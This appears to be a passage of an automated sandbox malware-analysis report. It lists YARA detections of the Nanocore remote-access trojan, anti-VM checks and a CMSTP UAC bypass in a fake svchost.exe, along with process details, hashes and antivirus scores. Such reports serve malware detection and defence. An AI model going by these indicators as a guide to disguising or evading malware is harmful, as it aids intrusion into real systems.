                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.563022898.0000000003041000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578768354.0000000007320000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578768354.0000000007320000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.575763359.00000000057B0000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.575763359.00000000057B0000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.564742845.000000000407B000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.564742845.000000000407B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.557519070.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.557519070.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.557519070.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578744575.0000000007310000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578744575.0000000007310000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578923470.0000000007390000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578923470.0000000007390000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578826405.0000000007350000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578826405.0000000007350000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578840773.0000000007360000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578840773.0000000007360000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.566519721.0000000004B62000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578220944.0000000007180000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578220944.0000000007180000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.567629894.0000000004C4D000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.567629894.0000000004C4D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578895486.0000000007380000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578895486.0000000007380000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578721350.0000000007300000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578721350.0000000007300000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578805532.0000000007340000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578805532.0000000007340000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578788151.0000000007330000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578788151.0000000007330000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578193481.0000000007170000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578193481.0000000007170000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.566082157.0000000004AEC000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.566082157.0000000004AEC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                    General

                    Start time:19:00:17
                    Start date:26/10/2021
                    Path:C:\Windows\System32\svchost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Imagebase:0x7ff70d6e0000
                    File size:51288 bytes
                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    General

                    Start time:19:00:18
                    Start date:26/10/2021
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4588 -ip 4588
                    Imagebase:0x870000
                    File size:434592 bytes
                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    General

                    Start time:19:00:25
                    Start date:26/10/2021
                    Path:C:\Users\Public\Documents\???????????????\svchost.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\Public\Documents\???????????????\svchost.exe'
                    Imagebase:0x1d0000
                    File size:12288 bytes
                    MD5 hash:0475ED517DA8A71BC4A87F14A44CF8FE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000000.432859134.00000000045D7000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000000.432859134.00000000045D7000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000000.433302468.00000000048F0000.00000004.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000000.433302468.00000000048F0000.00000004.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000000.453811934.00000000045D7000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000000.453811934.00000000045D7000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000000.454733014.00000000048F0000.00000004.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000000.454733014.00000000048F0000.00000004.00020000.sdmp, Author: Joe Security
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\Public\Documents\???????????????\svchost.exe, Author: Florian Roth
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 62%, Virustotal, Browse
                    • Detection: 23%, Metadefender, Browse
                    • Detection: 79%, ReversingLabs

                    General

                    Start time:19:00:28
                    Start date:26/10/2021
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 2636
                    Imagebase:0x870000
                    File size:434592 bytes
                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET

                    General

                    Start time:19:00:33
                    Start date:26/10/2021
                    Path:C:\Users\Public\Documents\???????????????\svchost.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\Public\Documents\???????????????\svchost.exe'
                    Imagebase:0xc50000
                    File size:12288 bytes
                    MD5 hash:0475ED517DA8A71BC4A87F14A44CF8FE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000000.439836868.0000000005370000.00000004.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000000.439836868.0000000005370000.00000004.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000000.455922021.0000000004371000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000000.455922021.0000000004371000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000000.461938081.0000000005370000.00000004.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000000.461938081.0000000005370000.00000004.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000002.567889136.0000000004371000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.567889136.0000000004371000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000002.576244097.0000000004795000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.576244097.0000000004795000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000000.457226716.0000000004795000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000000.457226716.0000000004795000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000000.461847446.00000000050AF000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000000.461847446.00000000050AF000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 0000000F.00000000.461847446.00000000050AF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000000.435662892.0000000004795000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000000.435662892.0000000004795000.00000004.00000001.sdmp, Author: Joe Security

                    Disassembly

                    Code Analysis

                    Reset < >